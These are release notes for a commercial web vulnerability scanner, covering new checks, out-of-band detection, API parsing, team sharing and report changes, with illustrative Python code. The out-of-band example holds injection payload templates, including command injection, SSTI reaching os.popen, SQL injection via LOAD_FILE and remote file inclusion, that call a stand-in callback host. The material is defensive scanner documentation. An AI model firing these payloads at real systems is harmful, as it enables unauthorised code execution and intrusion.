Release notes

2024-11-19: Boost your web scans - faster, more accurate & expanded detection capabilities

Boost your web scans - faster, more accurate & expanded detection capabilities

The latest web scan engine update makes scans faster and their results more precise, and expands detection coverage, so that security issues are identified earlier in the scan cycle.

Key new checks include an email misconfiguration checker and an email configuration analyzer, active and passive metrics file exposure checks, XPath injection detection, brute-force URL discovery, and two WebSocket checks.

Out-of-Band (OOB) coverage now includes detection of blind SSTI, SQL injection, HTTP response splitting, OS command injection, and remote file inclusion, that is, cases where the injected payload produces no visible change in the HTTP response and is confirmed through a callback to the scanner instead. This extends detection to asynchronous and real-time attack vectors that response-based checks miss. 

This update also improves the web scan engine itself: scans complete sooner and detection results are more accurate, without reducing the thoroughness of the scan. 

This update also adds coverage for the following vulnerabilities and exposures:  

  • Email misconfiguration checker 
    Identifies misconfigurations in a domain's email setup that may lead to unauthorized access or exposure of sensitive data. 
  • Metrics file exposure (active) 
    Actively requests known metrics file locations and reports any that are reachable, since exposed metrics can reveal sensitive operational data. 
  • Metrics file exposure (passive) 
    Checks responses the scanner has already received for signs of metrics file exposure. No additional requests are sent, so the check adds no load on the target, and potential leaks are still reported. 
  • Email configuration analyzer 
    Analyzes email server settings to detect vulnerabilities or insecure configurations that attackers could exploit. 
  • XPATH injection 
    Identifies inputs that are embedded unsanitized into XPath queries against XML data. An attacker can then change the structure of the query, for example to read nodes they should not see or to bypass a lookup-based login check. 
  • Brute force URL discovery 
    Requests large numbers of candidate paths to uncover unlinked or poorly protected URLs that may expose sensitive data or functionality. 
  • WebSocket exposure 
    Detects exposed WebSocket endpoints that could lead to unauthorized data access over the real-time channel. 
  • Open WebSocket vulnerability 
    Identifies open or insecurely configured WebSocket channels that could allow attackers to intercept or inject messages in real time. 
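To make the XPath injection item concrete, here is an added example written for these notes; it is not Holm Security's detection code. It shows a user lookup that interpolates untrusted input into an XPath expression, the same lookup done safely, and the error-based probe a scanner can use: a benign value plus the same value with an appended single quote. Python's xml.etree XPath subset has no `or` operator, so the classic `' or '1'='1` bypass cannot be shown with it; the probe instead relies on the parse error a stray quote causes, which is exactly the signal error-based detection looks for. The user records and the function names are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample "user store" for this example; not taken from the page.
USERS_XML = """
<users>
  <user name="alice" role="admin"/>
  <user name="bob" role="user"/>
</users>
"""
ROOT = ET.fromstring(USERS_XML)


def lookup_role_vulnerable(username):
    """Builds the XPath expression by string concatenation.

    Untrusted input lands inside the query, so a quote in the input changes
    the structure of the expression instead of being treated as data.
    """
    expr = f"./user[@name='{username}']"
    node = ROOT.find(expr)          # raises SyntaxError on a malformed predicate
    return node.get("role") if node is not None else None


def lookup_role_safe(username):
    """Keeps the query fixed and compares the untrusted value in code.

    ElementTree has no parameter binding, so the safe pattern is to select the
    candidate nodes with a static path and match the attribute in Python.
    """
    for node in ROOT.findall("./user"):
        if node.get("name") == username:
            return node.get("role")
    return None


def probe_xpath_injection(lookup):
    """Error-based probe of the kind an XPath injection check performs.

    A benign value and the same value with an appended single quote are sent.
    If the benign value is handled but the quoted one makes the query fail to
    parse, the input is being interpolated into an XPath expression. Over HTTP
    a scanner would look for an XPath error message or a 500 response instead
    of catching the exception directly.
    """
    results = {}
    for label, value in (("benign", "bob"), ("quoted", "bob'")):
        try:
            lookup(value)
            results[label] = "ok"
        except SyntaxError:
            results[label] = "xpath_error"
    results["injectable"] = (results["benign"] == "ok"
                             and results["quoted"] == "xpath_error")
    return results
```

Running `probe_xpath_injection` against the vulnerable lookup flags it as injectable, while the safe lookup treats the quoted value as an unknown user and returns nothing.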

Expanded coverage for Out-of-Band (OOB) vulnerabilities 

The new release adds several Out-of-Band (OOB) plugins for vulnerabilities whose exploitation leaves no trace in the HTTP response. Instead of inspecting the response, the scanner injects a payload that makes the vulnerable server contact a scanner-controlled listener (for example through a DNS lookup or an HTTP request), and that callback is the proof that the payload was executed. This is how the blind variants of the listed vulnerabilities are confirmed. The most notable additions are Out-of-Band Server-Side Template Injection (OOB SSTI) and Out-of-Band SQL Injection (OOB SQLI); in total there are seven OOB plugins, which also cover response splitting, OS command injection, and remote file inclusion. Because the callback may arrive some time after the request that triggered it, OOB detection is inherently asynchronous. 
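The following added example illustrates the correlation step that makes OOB detection work; it is written for these notes and is not the scan engine's own code. Each injection attempt gets its own unguessable callback hostname, the payload carries that hostname, and interactions recorded by the listener are mapped back to the exact URL, parameter and vulnerability class that caused them. The payload templates are generic textbook shapes, the listener log format is an assumption made for the example, and the log lines in the usage are constructed.

```python
import re
import secrets
from dataclasses import dataclass

# Illustrative payload shapes, one per OOB vulnerability class. "HOST" is
# replaced with the unique callback hostname. These are generic textbook
# forms written for this example, not the scan engine's own payloads.
PAYLOAD_TEMPLATES = {
    "os_command_injection": ";nslookup HOST",
    "remote_file_inclusion": "http://HOST/inc.txt",
    "response_splitting": "%0d%0aLocation:%20http://HOST/",
    # MySQL on Windows: a UNC path in LOAD_FILE triggers a DNS lookup
    "sql_injection": "'||(SELECT LOAD_FILE('\\\\\\\\HOST\\\\a'))||'",
    # Jinja2-style template expression reaching os.popen
    "ssti": "{{ cycler.__init__.__globals__.os.popen('nslookup HOST').read() }}",
}


@dataclass(frozen=True)
class InjectionPoint:
    url: str
    parameter: str
    vuln_class: str
    payload: str


class OOBSession:
    """Issues one unique callback hostname per injection attempt and maps
    listener interactions back to the request that caused them."""

    # Assumed listener log line format for this example:
    #   <timestamp> <dns|http> <hostname looked up or requested> <source ip>
    LOG_LINE = re.compile(r"^(\S+)\s+(dns|http)\s+(\S+)\s+(\S+)$")

    def __init__(self, base_domain):
        self.base_domain = base_domain.lower().rstrip(".")
        self.registry = {}

    def make_payload(self, url, parameter, vuln_class):
        """Returns (callback_host, payload) and records where it was injected."""
        token = secrets.token_hex(6)   # unguessable, so a callback cannot be forged by guessing
        host = f"{token}.{self.base_domain}"
        payload = PAYLOAD_TEMPLATES[vuln_class].replace("HOST", host)
        self.registry[token] = InjectionPoint(url, parameter, vuln_class, payload)
        return host, payload

    def correlate(self, log_lines):
        """Turns listener interactions into findings, each attributed to one
        URL, parameter and vulnerability class."""
        findings = []
        suffix = "." + self.base_domain
        for line in log_lines:
            m = self.LOG_LINE.match(line.strip())
            if not m:
                continue
            timestamp, proto, name, source = m.groups()
            name = name.lower().rstrip(".")   # DNS is case-insensitive; drop the root dot
            if not name.endswith(suffix):
                continue
            # The token is the label directly under the base domain; resolvers
            # or browsers may prepend further labels, so take the last one.
            token = name[: -len(suffix)].split(".")[-1]
            point = self.registry.get(token)
            if point is None:
                continue   # unknown token: noise, probing of the listener, or a replay
            findings.append({
                "url": point.url, "parameter": point.parameter,
                "vuln_class": point.vuln_class, "payload": point.payload,
                "interaction": proto, "source": source, "time": timestamp,
            })
        return findings


# Usage with constructed listener log lines.
session = OOBSession("oob.example")
host, payload = session.make_payload("https://target.test/search", "q", "os_command_injection")
session.make_payload("https://target.test/item", "id", "sql_injection")
sample_log = [
    f"2024-11-19T10:00:01Z dns {host.upper()}. 203.0.113.5",   # resolver upper-cased the name
    "2024-11-19T10:00:02Z dns notours.oob.example 198.51.100.9",  # unknown token, ignored
    f"2024-11-19T10:00:09Z http {host} 203.0.113.5",
]
for finding in session.correlate(sample_log):
    print(finding["vuln_class"], finding["url"], finding["parameter"], finding["interaction"])
```

Two details matter in practice: the token must be unguessable, otherwise anyone who learns the base domain can fabricate callbacks and create false positives, and the correlation must tolerate case changes and extra labels, because the lookup that arrives at the listener is rarely byte-identical to what was injected.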

Release plan 
The new version will be rolled out to public scanners first and will be available in locally installed Scanner Appliances in Q1 2025.  

Expanded detection capabilities for API Security 

The latest update extends API Security with two new checks: it detects publicly exposed API documentation, and it checks whether API parameters enforce data-type and value limits, since parameters that accept any type or size are easier to abuse for injection. The scanner reports these conditions; restricting access to the documentation or enforcing the limits remains a change to make on the API side. 

Parser support has been expanded to include RAML, HAR, Burp Suite, Fiddler, and Postman, so requests and responses exported from these tools can be imported and analysed directly. 

This release adds coverage for exposed API documentation and for missing API parameter data-type limits, two conditions that make injection attacks and misuse of an API easier. 

Additional API coverage included in this release: 

  • Exposed API documentation 
    Detects publicly accessible API documentation that could provide attackers with a roadmap to exploit APIs. 
  • API parameter data-type limits check 
    Checks whether the API rejects parameter values of the wrong type or outside the expected limits; endpoints that accept such values are more exposed to injection attacks and misuse. 

Enhanced API parser support 

We are introducing parser support for widely used API formats and tools, so that data exported from them can be imported and analysed. The supported formats now include RAML (RESTful API Modeling Language), HAR (HTTP Archive), Burp Suite, Fiddler, and Postman. The parser extracts the recorded requests and responses from the imported file, matches them against the web application's site paths and, for every matched path, automatically identifies the requests and parses the responses. This gives the scan concrete endpoints, parameter names and example responses to work from, and so deeper vulnerability coverage than crawling alone. 
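As an added illustration of what such an input parser does (and of the baseline the parameter data-type limits check works from), the example below parses a HAR 1.2 file, keeps only the entries under the target site, extracts method, path, query and body parameters, and infers a data type for each observed value. It is written for these notes and is not Holm Security's parser; the HAR fragment is constructed, and the redaction list is an assumption. One practical caveat it encodes: a HAR exported from a browser or proxy carries live session cookies and bearer tokens, so those headers are redacted before anything is stored or reported.

```python
import json
from urllib.parse import parse_qsl, urlsplit

# Constructed HAR 1.2 fragment for this example; not an export from any real site.
SAMPLE_HAR = json.dumps({"log": {"version": "1.2", "entries": [
    {"request": {"method": "GET",
                 "url": "https://api.example.test/v1/users?id=42&expand=roles",
                 "headers": [{"name": "Authorization", "value": "Bearer eyJhbGciOi..."}]},
     "response": {"status": 200,
                  "content": {"mimeType": "application/json", "text": "{\"id\": 42}"}}},
    {"request": {"method": "POST",
                 "url": "https://api.example.test/v1/users",
                 "headers": [{"name": "Content-Type", "value": "application/json"}],
                 "postData": {"mimeType": "application/json",
                              "text": "{\"name\": \"x\", \"age\": \"30\", \"active\": \"true\"}"}},
     "response": {"status": 201,
                  "content": {"mimeType": "application/json", "text": ""}}},
    {"request": {"method": "GET", "url": "https://cdn.example.test/app.js", "headers": []},
     "response": {"status": 200,
                  "content": {"mimeType": "text/javascript", "text": ""}}},
]}})

# Assumed list of header names whose values must never reach scan logs or reports.
SENSITIVE_HEADERS = {"authorization", "cookie", "x-api-key"}


def infer_type(value):
    """Guesses the data type the API is likely to expect for an observed value.

    A parameter seen only with integers can later be sent a string or an
    oversized number to check whether the API actually rejects it.
    """
    if not isinstance(value, str):
        return type(value).__name__           # already typed in a JSON body
    if value.lstrip("-").isdigit():
        return "integer"
    if value.lower() in ("true", "false"):
        return "boolean"
    return "string"


def parse_har(har_text, site_prefix):
    """Extracts the recorded requests whose URL falls under site_prefix.

    site_prefix is scheme + host + path prefix, e.g. https://api.example.test/v1/.
    Requests to other hosts (CDNs, analytics, third parties) are dropped so
    they never become scan targets.
    """
    site = urlsplit(site_prefix)
    requests = []
    for entry in json.loads(har_text)["log"]["entries"]:
        req, resp = entry["request"], entry.get("response", {})
        url = urlsplit(req["url"])
        if (url.scheme, url.netloc) != (site.scheme, site.netloc) \
                or not url.path.startswith(site.path):
            continue
        query = dict(parse_qsl(url.query, keep_blank_values=True))
        body = {}
        post = req.get("postData")
        if post:
            mime = post.get("mimeType", "")
            if mime.startswith("application/json"):
                try:
                    parsed = json.loads(post.get("text") or "{}")
                except ValueError:
                    parsed = {}
                body = parsed if isinstance(parsed, dict) else {}
            elif mime.startswith("application/x-www-form-urlencoded"):
                body = dict(parse_qsl(post.get("text", ""), keep_blank_values=True))
        headers = {
            h["name"]: ("<redacted>" if h["name"].lower() in SENSITIVE_HEADERS else h["value"])
            for h in req.get("headers", [])
        }
        requests.append({
            "method": req["method"],
            "path": url.path,
            "query": query,
            "body": body,
            "param_types": {k: infer_type(v) for k, v in {**query, **body}.items()},
            "headers": headers,
            "status": resp.get("status"),
            "response_mime": resp.get("content", {}).get("mimeType"),
        })
    return requests


for r in parse_har(SAMPLE_HAR, "https://api.example.test/v1/"):
    print(r["method"], r["path"], r["param_types"], r["status"])
```

The CDN entry is discarded because its host differs from the site prefix; the two API entries come out with their parameters and inferred types, which is the starting point for sending deliberately mistyped values in the data-type limits check.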

How do I set up input parsers in a web app scan?

Want to get started with API Security? 

Please contact your sales representative or send an email to sales@holmsecurity.com, and we will help you get started with API Security. 

Release plan 
The new version will be rolled out to public scanners first and will be available in locally installed Scanner Appliances in Q1 2025.  

Share scans & schedules with teams 

You can now share specific scans and schedules with selected Teams. Access is targeted and delegated: a Team works with the scans and schedules that have been shared with it, so each Team can concentrate on the scans in its own scope without losing overall coverage. 

How do I share scans and schedules with teams?

Bulk update the business impact for network assets 

Easily streamline the management of network assets by bulk updating their business impact settings. This new capability allows you to adjust the business impact of multiple assets at once, reducing the manual effort. 

With the bulk update, you can adjust multiple assets at once and set their business impact to be inherited from Tags instead of being set individually per asset.  

How do I bulk update business impact on network assets?

Enhancements to reports  

Our latest update simplifies report distribution and enhances readability with the following improvements: 

Report sharing without phone number 

Generated reports can now be sent without requiring a password or phone number, which makes it easier to share findings with stakeholders. Note that a report shared this way is not protected by a one-time code, so anyone who obtains the file or link can read it; consider keeping the password option for reports whose contents are sensitive. Scheduled reports will receive this support in an upcoming product release. 

Improved report categories & template names 

Report categories and template names have been refreshed, helping you to quickly identify the right templates for your needs. 

Other enhancements 

  • The dashboard has received several improvements, including updated description texts, and several minor issues in its widgets have been resolved.